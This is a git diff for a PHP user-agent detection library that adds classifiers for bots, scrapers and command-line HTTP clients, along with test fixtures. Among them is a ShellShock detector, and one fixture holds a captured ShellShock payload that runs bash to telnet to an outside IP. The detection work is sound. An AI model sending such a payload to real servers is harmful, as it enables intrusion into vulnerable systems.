+ * + * @return bool true if matched on the PaperLiBot/ token (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotPaperli() + { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ahrefs survey bot (case-insensitive match on the AhrefsBot/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotAhrefs() + { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::AHREFS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Majestic 12 spider (case-insensitive match on the MJ12Bot/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotMJ12() + { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::MJ12); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the LiveLap spider (case-insensitive match on the LivelapBot/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotLiveLap() + { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is a Web Distributed Authoring and Versioning (WebDAV) client. Usually unexpected WebDAV requests are hack attempts.
+ * + * @return bool true if matched on WEBDAV Client or Microsoft Office Existence Discovery (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotWebdav() + { + if (stripos(self::$userAgentString, "WEBDAV Client") !== false || + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) { //Office Webdav probe + self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MetaURI scraper (case-insensitive match on the MetaURI API/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotMetaURI() + { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::METAURI); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); + return true; + } + return false; + } + + /** + * Determine if the agent is the TLSProbe tool (case-insensitive match on the TLSProbe/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotTLSProbe() + { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); + return true; + } + return false; + } + + /** + * Determine if the agent is one of the Scoop.it bots (case-insensitive match on wpif Safari or imgsizer Safari). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotScoopIt() + { + if (stripos(self::$userAgentString, "wpif Safari") !== false + || stripos(self::$userAgentString, "imgsizer Safari") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Netcraft SSL Server Survey.
+ * + * @return bool true if matched on Netcraft SSL Server Survey (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotNetcraft() + { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the curl library/cli tool (case-insensitive match on the curl/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotCurl() + { + if (stripos(self::$userAgentString, "curl/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::CURL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); + return true; + } + return false; + } + + /** + * Determine if the agent is a Python HTTP client (case-insensitive match on python-requests/ or python-urllib/). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotPython() + { + if (stripos(self::$userAgentString, "python-requests/") !== false || + stripos(self::$userAgentString, "python-urllib/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PYTHON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.python.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Go HTTP client (case-insensitive match on the Go-http-client token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotGoLang() + { + if (stripos(self::$userAgentString, "Go-http-client") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOLANG); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://golang.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Perl libwww client.
+ * + * @return bool true if matched on the libwww-perl/ token (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotPerl() + { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PERL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.perl.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the wget tool (case-insensitive match on the Wget/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotWget() + { + if (stripos(self::$userAgentString, "Wget/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WGET); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the zgrab TLS banner tool (case-insensitive match on the zgrab/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotZGrab() + { + if (stripos(self::$userAgentString, "zgrab/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); + return true; + } + return false; + } + + /** + * Determine if the agent is a Java HTTP client (case-insensitive match on the Java/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotJava() + { + if (stripos(self::$userAgentString, "Java/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::JAVA); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); + return true; + } + return false; + } + + /** + * Determine if the agent string carries the ShellShock exploit payload.
+ * + * @return bool true if the payload prefix is found (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotShellshock() + { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); + self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); + self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Browsershots testing tool (case-insensitive match on the Browsershots token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotBrowershots() + { + if (stripos(self::$userAgentString, "Browsershots") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://browsershots.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the who.is spider (case-insensitive match on the who.is bot token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotWhois() + { + if (stripos(self::$userAgentString, "who.is bot") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WHOIS); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.who.is/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MageReport exploit survey (case-insensitive match on the MageReport token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotMageReport() + { + if (stripos(self::$userAgentString, "MageReport") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AdBeat advertising bot.
+ * + * @return bool true if matched on the adbeat.com token (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotAdbeat() + { + if (stripos(self::$userAgentString, "adbeat.com") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); + return true; + } + return false; + } + + /** + * Determine if the agent is the SocialRankIO crawler (case-insensitive match on the SocialRankIOBot token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotSocialrank() + { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Gluten Free crawler (case-insensitive match on the Gluten Free Crawler/ token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotGlutenFree() + { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Proximic spider (case-insensitive match on the proximic; token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotProximic() + { + if (stripos(self::$userAgentString, "proximic;") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ubermetrics survey bot.
+ * + * @return bool true if matched on the @ubermetrics-technologies.com token (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotUbermetrics() + { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Verisign ips-agent (case-insensitive match on the ips-agent token). + * + * @return bool true if matched (name, type and info URL are recorded on the scripted agent), false otherwise + */ + public static function checkRobotVerisign() + { + if (stripos(self::$userAgentString, "ips-agent") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); + return true; + } + return false; + } +} diff --git a/src/edgeVersionMap.php b/src/edgeVersionMap.php new file mode 100644 index 0000000..3836545 --- /dev/null +++ b/src/edgeVersionMap.php @@ -0,0 +1,70 @@ + '0.10.10049', + '12.10051' => '0.11.10051', + '12.10052' => '0.11.10052', + '12.10061' => '0.11.10061', + '12.10074' => '0.11.10074', + '12.10080' => '0.11.10080', + '12.10122' => '13.10122', + '12.10130' => '15.10130', + '12.10136' => '16.10136', + '12.10149' => '19.10149', + '12.10158' => '20.10158', + '12.10159' => '20.10159', + '12.10162' => '20.10162', + '12.10166' => '20.10166', + '12.10240' => '20.10240', + '12.10512' => '20.10512', + '12.10514' => '20.10514', + '12.10525' => '20.10525', + '12.10532' => '20.10532', + '12.10536' => '20.10536', + '13.10547' => '21.10547', + '13.10549' => '21.10549', + '13.10565' => '23.10565', + '13.10572' => '25.10572', + '13.10576' => '25.10576', + '13.10581' => '25.10581', + '13.10586' => '25.10586', + '13.11082' => '25.11082', + '13.11099' => '27.11099', + '13.11102' => '28.11102', + '13.14251' => '28.14251', + '13.14257' => '28.14257', + '14.14267' => '31.14267', + '14.14271' => '31.14271', + '14.14279' => 
'31.14279', + '14.14283' => '31.14283', + '14.14291' => '34.14291', + '14.14295' => '34.14295', + '14.14300' => '34.14300', + '14.14316' => '37.14316', + '14.14322' => '37.14322', + '14.14327' => '37.14327', + '14.14328' => '37.14328', + '14.14332' => '37.14332', + '14.14342' => '38.14342', + '14.14352' => '38.14352', + '14.14393' => '38.14393', + '14.14901' => '39.14901', + '14.14905' => '39.14905', + '14.14915' => '39.14915', + '14.14926' => '39.14926', + '14.14931' => '39.14931', + '14.14936' => '39.14936', + '15.14942' => '39.14942', + '15.14946' => '39.14946', + '15.14951' => '39.14951', + '15.14955' => '39.14955', + '15.14959' => '39.14959', + '15.14965' => '39.14965', + '15.14971' => '39.14971', + '15.14977' => '39.14977', + '15.14986' => '39.14986', + '15.15002' => '39.15002', + '15.15007' => '39.15007', + '15.15019' => '40.15019', + '15.15063' => '40.15063', +); diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php new file mode 100644 index 0000000..91a5d08 --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -0,0 +1,19 @@ +getString()); + $this->assertSame($userAgentString->getScriptedAgent(), $agent->getName()); + $this->assertSame($userAgentString->getScriptedAgentType(), $agent->getType()); + } + } +} diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php new file mode 100644 index 0000000..fb03756 --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -0,0 +1,15 @@ +assertSame(ScriptedAgent::UNKNOWN, $agent->getName()); + } +} diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index d6628ec..d0b2d77 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -3,11 +3,13 @@ Opera - 21.0.1432.67 + 21.0.1432.67 OS X 10.9.3 
unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 @@ -20,6 +22,8 @@ 3.2 iPad unknown + unknown + unknown Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc @@ -32,6 +36,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 @@ -44,6 +50,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 @@ -56,6 +64,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 YaBrowser/15.6.2311.3451 (beta) Yowser/2.0 Safari/537.36 @@ -68,6 +78,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) @@ -80,6 +92,8 @@ 10.10 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 @@ -91,6 +105,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) OPiOS/10.1.1.92212 Mobile/12B440 Safari/9537.53 @@ -103,6 +119,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/12B440 Safari/600.1.4 @@ -110,11 +128,13 @@ Edge - 12.10136 + 16.10136 Windows 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136 @@ -127,6 +147,8 @@ 
10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 @@ -138,6 +160,8 @@ 7 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Vivaldi/1.0.83.38 Safari/537.36 @@ -149,6 +173,8 @@ 47.0.2526.80 unknown unknown + unknown + unknown Mozilla/5.0 (X11; CrOS x86_64 7520.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 @@ -160,6 +186,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -171,6 +199,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -182,6 +212,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -193,6 +225,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -204,6 +238,8 @@ 8 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7 @@ -215,6 +251,8 @@ unknown unknown unknown + unknown + unknown Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5 @@ -226,21 +264,36 @@ 10.0.9.2372 unknown unknown + unknown + unknown Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.0.9.2372 Mobile Safari/537.10+ Edge - 14.14393 + 38.14393 Windows Phone 10 Lumia 640 LTE unknown + unknown + unknown 
Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 + + Edge + unknown + Windows Phone + 10 + Lumia 640 LTE + unknown + + Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/12.00049 + + BlackBerry 7.1.0.523 @@ -248,6 +301,8 @@ 7.1.0.523 unknown unknown + unknown + unknown Mozilla/5.0 (BlackBerry; U; BlackBerry 9380; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.523 Mobile Safari/534.11+ @@ -259,20 +314,700 @@ 5.1.1 Samsung SM-G360T1 unknown + unknown + unknown Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 - wkhtmltopdf + Safari unknown Linux unknown unknown unknown + wkhtmltopdf + Tool Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Baidu + Spider + + Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + Baiduspider+(+http://www.baidu.com/search/spider_jp.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + BaiDuSpider + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google + Spider + + Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot/2.1 (+http://www.google.com/bot.html) + + + + Chrome + 41.0.2272.96 + Android + 6.0.1 + unknown + unknown + Google + Spider + + ​Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; 
Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-News + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Image/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Video/1.0 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mozilla/5.0 (compatible; Mediapartners-Google/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mediapartners-Google + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google (+http://www.google.com/adsbot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google-Mobile-Apps + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Yahoo! Slurp + Spider + + Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Spider + + Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot/2.0b (+http://search.msn.com/msnbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Ad bots + + Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Bing + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b + + + + unknown + unknown + unknown + unknown + unknown + unknown + W3C Validator + Tool + + W3C_Validator/1.0 libwww-perl/0.40 + + + + Safari + 8.0 + iOS + 8.1 + iPhone + unknown + Yandex + Spider + + Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Gluten Free + Survey + + Mozilla/5.0 (compatible; Gluten Free Crawler/1.0; +http://glutenfreepleasure.com/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Twitter + Preview + + Twitterbot/1.0 + + + + Safari + 8.0.2 + OS X + 10.10.1 + unknown + unknown + Apple + Spider + + Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Paper.li + Spider + + Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li) + + + + unknown + unknown + unknown + unknown + unknown + unknown + SocialRank.io + Survey + + SocialRankIOBot; 
http://socialrank.io/about + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ahrefs.com Backlink Research Tool + Survey + + Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Majestic12 + Spider + + MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+) + + + + unknown + unknown + unknown + unknown + unknown + unknown + LiveLap + Spider + + LivelapBot/0.2 (http://site.livelap.com/crawler) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Skype + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 + + + + Safari + unknown + Linux + unknown + unknown + unknown + AdBeat + Ad bots + + Mozilla/5.0 (X11; U; Linux x86; %lang_code%) adbeat.com/policy Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 AppleWebKit/532.4 Safari/532.4 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Facebook + Preview + + facebookexternalhit/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + WEBDAV + Tool + + WEBDAV Client + + + + Firefox + 6.0 + Windows + 7 + unknown + unknown + Google Favicon + Scripted Agent + + Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon + + + + unknown + unknown + unknown + unknown + unknown + unknown + MetaURI + Survey + + MetaURI API/2.0 metauri.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + TLSProbe + Tool + + TLSProbe/1.0 (+https://scan.trustnet.venafi.com/) + + + + Safari + unknown + Linux + unknown + unknown + unknown + Scoop.it + Spider + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) imgsizer Safari/537.21 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Netcraft SSL + Survey + + Netcraft SSL Server Survey - contact info@netcraft.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + Curl + Scripted Agent + + curl/7.37.0 + + + + unknown + unknown + unknown + unknown + unknown + 
unknown + Python + Scripted Agent + + python-urllib/12.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + GoLang + Scripted Agent + + Go-http-client/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Perl + Scripted Agent + + libwww-perl/1.0 + + + + Firefox + 3.5.3 + Linux + unknown + unknown + unknown + Verisign + Survey + + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3 + + + + unknown + unknown + Linux + unknown + unknown + unknown + Wget + Tool + + Wget/1.13.4 (linux-gnu) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + ZGrab + Tool + + Mozilla/5.0 zgrab/0.3 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Java + Scripted Agent + + Java/1.6.0_14 + + + + unknown + unknown + unknown + unknown + unknown + unknown + ShellShock exploit + Exploit attempt + + () { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq + + + + unknown + unknown + unknown + unknown + unknown + unknown + BrowserShots + Survey + + BrowserShots + + + + unknown + unknown + unknown + unknown + unknown + unknown + Who.is + Spider + + Who.is Bot + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + MageReport + Survey + + Mozilla/5.0 (www.magereport.com/page/about) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ubermetrics Technologies + Survey + + 